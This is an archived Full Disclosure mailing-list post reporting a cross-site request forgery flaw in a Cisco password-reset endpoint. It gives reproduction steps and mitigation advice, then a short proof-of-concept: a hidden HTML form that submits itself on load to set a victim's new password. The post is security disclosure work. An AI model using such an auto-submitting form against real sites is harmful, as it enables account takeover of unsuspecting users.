[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Security Vulnerability : Cisco web site CSRF in change password lead to full account take over

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Security Vulnerability : Cisco web site CSRF in change password lead to full account take over
From: mohamed sayed <eng.mohamed8860@xxxxxxxxx>
Date: Mon, 24 Oct 2016 08:49:34 +0200

Dear Team ,

Hope this email finds you well , Please be informed that i found a Major
Security vulnerability in the Main Cisco Web Site  https://www.cisco.com/

*Introduction*

The vulnerability allows a remote hacker to force Victim`s browser to send
reset password for their accounts and then  the Hacker will be able to take
the ownership of this account.
----------------------

*Description and Steps To reproduce the issue *

1-Go to Main Cisco web site and create a new Account

2-Click on forget password and then enter your email

3-An email address will be sent to your Inbox...click the link to reset
your password

4-After capturing the request (attached) found that it was Sent with a
session token to open the Web page

but with the Confirmation - Sending Email , this session Token didn`t sent
plus there is no Authorization code or anti forgery tokens !

*this lead to CSRF Vulnerability in the back end side *

5-By writing very simple POC script to simulate this request ...the hacker
will be able to change password of the registered/Loggedin victims in Cisco Web
application.

and by knowing his email he will be able to take his account easily !
------------------------

*Mitigation*
i`m suggesting the following solution to solve this issue :

1-In *post* reset password action : the request should contains the Session
token or authorization code and the back end side should validate that this
session is valid

2-Anti Forgery token should be added to the request parameters .

-------------------
Attached Screen shots and Simple POC (CISCO_ACCOUNT_OWNERSHIPT_CSRF.html)
to represent the issue.

if there is any thing not clear , please let me know

Looking forward to read from you soon :)

Regards

<form id="f1"  
action="https://tools.cisco.com/IDPSWD/passwordResetSubmitAction.do"; 
method="post">
<input type="hidden" name="user" value="guest"/>
<input type="hidden" name="pwdForm.newPwd" value="Ahmed_887203243"/>
<input type="hidden" name="pwdForm.reTypePwd" value="Ahmed_887203243"/>
</form>

<script type="text/javascript">
document.forms["f1"].submit();
</script>

Attachment: reset_password_1.jpg
Description: JPEG image

Attachment: reset_password_2.jpg
Description: JPEG image

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] XSS on public PGP servers
Next by Date: [FD] Apple macOS 10.12.1/iOS 10 SecureTransport SSL handshake OCSP MiTM and DoS
Previous by thread: [FD] XSS on public PGP servers
Next by thread: [FD] Apple macOS 10.12.1/iOS 10 SecureTransport SSL handshake OCSP MiTM and DoS
Index(es):
- Date
- Thread